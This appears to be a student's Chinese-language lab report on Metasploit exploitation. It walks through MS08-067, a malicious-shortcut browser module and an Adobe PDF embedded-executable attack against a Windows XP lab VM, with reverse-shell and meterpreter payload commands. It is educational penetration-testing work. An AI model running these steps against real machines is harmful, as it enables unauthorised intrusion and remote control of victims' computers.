MS08_067漏洞渗透攻击(主动攻击)
这个实验使用winXPenSP3为靶机,并且只能用它当靶机。。。。并且确保两台虚拟机在同一网段。
1.打开终端,输入msfconsole
![889835-20180424113254896-2071784943.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180424113254896-2071784943.png)
2.输入命令use exploit/windows/smb/ms08_067_netapi
,使用MS08_067
漏洞模块;
set payload generic/shell_reverse_tcp
指定攻击有效载荷; 4.设置具体参数:set LHOST Kali的IP set RHOST Windows的IP;
5.输入show options
查看所有参数是否设置正确
![889835-20180424113408781-52248154.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180424113408781-52248154.png)
6.最后发起攻击输入exploit
![889835-20180424113446155-285754411.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180424113446155-285754411.png)
MS11050安全漏洞(IE浏览器渗透攻击)
使用免考xp sp3
为靶机;
msfconsole
![889835-20180425160230349-537278511.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160230349-537278511.png)
search ms10_046
找到可以攻击的模块![889835-20180425160441668-1345545541.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160441668-1345545541.png)
输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用 set payload windows/meterpreter/reverse_tcp
设置payload,并使用show options
查看参数:
最后下令发起攻击exploit
复制local IP
,在靶机上使用IE浏览器进行访问:
此时返回kali
![889835-20180425162613473-2036380092.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162613473-2036380092.png)
使用 sessions -i 1 选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:
对Adobe的漏洞攻击
输入search adobe
查询和adobe
漏洞有关的模块
exploit/windows/fileformat/adobe_pdf_embedded_exe
作为选择,然后show payloads
查看payload
:![889835-20180425163208741-277551273.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425163208741-277551273.png)
use exploit/windows/fileformat/adobe_pdf_embedded_exe
选择windows/meterpreter/reverse_tcp
作为攻击载荷并输入命令 set windows/meterpreter/reverse_tcp
接着继续查看参数![889835-20180425164747784-389552693.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425164747784-389552693.png)
set LHOST Kali的IP
,接着exploit
进行攻击![889835-20180425164949659-1414727268.png](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425164949659-1414727268.png)
这个pdf文件是在隐藏文件夹中,所以我们需要在文件夹选项中选中查看隐藏文件。
输入命令进行监听回连
![889835-20180502105742916-309070190.png](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105742916-309070190.png)
辅助模块的应用
输入命令show auxiliary
查看辅助模块
scanner/http/options
接着输入命令use scanner/http/options
之后输入info
查看信息![889835-20180502105232332-1293886875.png](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105232332-1293886875.png)
![889835-20180502105322218-1226577013.png](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105322218-1226577013.png)
基础问题回答
用自己的话解释什么是exploit,payload,encode:
exploit:攻击手段,是能使攻击武器(payload)的方法;
payload:攻击武器,真正具有攻击性的代码; encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;实验体会
这个实验让我知道了平时杀毒软件提示有高危漏洞,这些漏洞是如何被别人利用从而达到攻击你电脑的目的的,但是只能通过特定的漏洞攻击特定的电脑,不知道什么时候我们也能熟练利用各种漏洞攻击各种电脑。还有就是,做这个实验还是需要一个好的实验环境的。。。我的kali做到一半时突然不能联网了。。。重启大法也没有用,最后又莫名能连上了。。。